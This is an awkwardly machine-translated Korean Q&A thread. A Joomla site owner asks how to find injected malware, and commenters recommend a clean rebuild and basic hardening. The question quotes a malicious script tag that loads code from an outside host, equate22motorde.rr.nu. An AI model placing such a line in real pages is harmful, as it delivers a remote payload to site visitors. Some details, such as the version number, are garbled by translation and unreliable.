일주일 전에 해킹당한 오래된 Joomla 10.0.15가 있습니다. 마이그레이션을 계획 중이므로 백업이 없지만 어떤 일이 발생했는지 알아야합니다. 모든 다시로드와Joomla 사이트 해킹
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct ="UA-xxxxxxx-x";
urchinTracker();
</script>
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script>
</body>
는 URL 변경 : 수정 권한 후, 모든 핵심 파일을 다시 설치, 여전히이 문제가, 첫 번째는 여전히 악성 코드가 있습니다. 코드가 어디에 있는지 알 수 없습니다. 나는 템플릿과 다른 파일들,하지만 아무것도 체크하지 않았다. 어디에서 확인할 수 있습니까?
또 다른 문제는 파일 및 폴더 액세스 권한이있는 경우에도이 joomla 설치가 폴더에 쓰거나 파일을 수정할 수 없다는 것입니다.
미리 감사드립니다.
Joomla 포럼에 묻기를 시도하십시오. – Steven
원본 웹 사이트를 수정하지 마십시오. Devin이 아래에서 언급했듯이 무엇이 바뀌 었는지 알 수 없으므로 모든 것을 해결했는지 결코 알 수 없습니다. 백업이 없다면 새로운 Joomla 설치에서 웹 사이트를 다시 작성하고 미디어를 복사하지만 코드를 복사하지 않는 것이 안전합니다. 이것은 Joomla (3 년 이상)의 매우 오래된 버전입니다. 조언을 구하는 가장 좋은 곳은 여기의 J1.0 보안 포럼에 있습니다. http://bit.ly/HbDJUs – Trev
joomla 사이트에 대한 몇 가지 좋은 보안 확장 기능을 설치하고 정기적으로 액세스 로그를 확인하고 중요한 파일, 오직 신뢰할 수있는 소스에서 확장 기능을 설치, 정기적으로 핵심 joomla 소스 파일을 업그레이 드 .... 이들은 joomla 사이트를 확보하기위한 최소한의 단계입니다. –